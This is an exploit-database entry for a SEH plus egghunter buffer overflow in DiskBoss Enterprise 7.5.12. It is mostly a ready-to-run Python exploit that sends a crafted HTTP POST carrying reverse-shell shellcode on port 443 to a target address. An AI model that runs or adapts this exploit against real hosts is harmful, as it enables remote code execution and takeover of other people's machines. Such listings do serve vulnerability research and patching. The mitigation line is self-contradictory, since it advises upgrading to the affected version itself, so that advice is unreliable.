DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow

vendor:

DiskBoss Enterprise

by:

Wyndell Bibera

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: DiskBoss Enterprise

Affected Version From: 7.5.12

Affected Version To: 7.5.12

Patch Exists: YES

Related CWE: N/A

CPE: a:flexense:diskboss_enterprise:7.5.12

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Professional SP3

2017

DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow

DiskBoss Enterprise 7.5.12 is vulnerable to a SEH + Egghunter Buffer Overflow vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an overly long string of 'A' characters followed by an egg, nopslide, shellcode, and a 'C' character padding. This will cause a buffer overflow and allow the attacker to execute arbitrary code.

Mitigation:

Upgrade to the latest version of DiskBoss Enterprise 7.5.12

Source

Exploit-DB raw data:

#!/usr/bin/python
 
# Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow
# Date: 10-01-2017
# Exploit Author: Wyndell Bibera
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe
# Version: 7.5.12
# Tested on: Windows XP Professional SP3

import socket

ip = "192.168.86.150"
port = 80
 
egg = "ezggezgg"
nopslide = "\x90" * 8

# Bad characters: \x00\x09\x0a\x0d\x20
# Reverse Shell @ Port 443 - Change shellcode section accordingly
shellcode = ("\xb8\x45\x49\xe1\x98\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x52\x31\x47\x12\x03\x47\x12\x83\x82\x4d\x03\x6d\xf0\xa6\x41"
"\x8e\x08\x37\x26\x06\xed\x06\x66\x7c\x66\x38\x56\xf6\x2a\xb5"
"\x1d\x5a\xde\x4e\x53\x73\xd1\xe7\xde\xa5\xdc\xf8\x73\x95\x7f"
"\x7b\x8e\xca\x5f\x42\x41\x1f\x9e\x83\xbc\xd2\xf2\x5c\xca\x41"
"\xe2\xe9\x86\x59\x89\xa2\x07\xda\x6e\x72\x29\xcb\x21\x08\x70"
"\xcb\xc0\xdd\x08\x42\xda\x02\x34\x1c\x51\xf0\xc2\x9f\xb3\xc8"
"\x2b\x33\xfa\xe4\xd9\x4d\x3b\xc2\x01\x38\x35\x30\xbf\x3b\x82"
"\x4a\x1b\xc9\x10\xec\xe8\x69\xfc\x0c\x3c\xef\x77\x02\x89\x7b"
"\xdf\x07\x0c\xaf\x54\x33\x85\x4e\xba\xb5\xdd\x74\x1e\x9d\x86"
"\x15\x07\x7b\x68\x29\x57\x24\xd5\x8f\x1c\xc9\x02\xa2\x7f\x86"
"\xe7\x8f\x7f\x56\x60\x87\x0c\x64\x2f\x33\x9a\xc4\xb8\x9d\x5d"
"\x2a\x93\x5a\xf1\xd5\x1c\x9b\xd8\x11\x48\xcb\x72\xb3\xf1\x80"
"\x82\x3c\x24\x06\xd2\x92\x97\xe7\x82\x52\x48\x80\xc8\x5c\xb7"
"\xb0\xf3\xb6\xd0\x5b\x0e\x51\x1f\x33\x46\x2d\xf7\x46\x66\x2c"
"\xb3\xce\x80\x44\xd3\x86\x1b\xf1\x4a\x83\xd7\x60\x92\x19\x92"
"\xa3\x18\xae\x63\x6d\xe9\xdb\x77\x1a\x19\x96\x25\x8d\x26\x0c"
"\x41\x51\xb4\xcb\x91\x1c\xa5\x43\xc6\x49\x1b\x9a\x82\x67\x02"
"\x34\xb0\x75\xd2\x7f\x70\xa2\x27\x81\x79\x27\x13\xa5\x69\xf1"
"\x9c\xe1\xdd\xad\xca\xbf\x8b\x0b\xa5\x71\x65\xc2\x1a\xd8\xe1"
"\x93\x50\xdb\x77\x9c\xbc\xad\x97\x2d\x69\xe8\xa8\x82\xfd\xfc"
"\xd1\xfe\x9d\x03\x08\xbb\xae\x49\x10\xea\x26\x14\xc1\xae\x2a"
"\xa7\x3c\xec\x52\x24\xb4\x8d\xa0\x34\xbd\x88\xed\xf2\x2e\xe1"
"\x7e\x97\x50\x56\x7e\xb2")
scpad = "\x90" * (2480 - len(shellcode) - len(nopslide))
shortjmp = "\xeb\x0f\x90\x90"

# Search for string 'ezgg' twice
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x65\x7a\x67\x67\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

extra = "\x90" * 9
pad = "\x90" * (5000 - len(extra) - 2496 - len(egghunter))

# POP POP RET Instruction
seh = "\x6b\xa6\x02\x10" 

buffer = (
"POST " + egg + nopslide + shellcode + scpad + shortjmp + seh + extra + egghunter + pad + " HTTP/1.1\r\n"
"Host: :192.168.86.150\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*    ;q=0.8\r\n\r\n")
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(buffer)
s.close()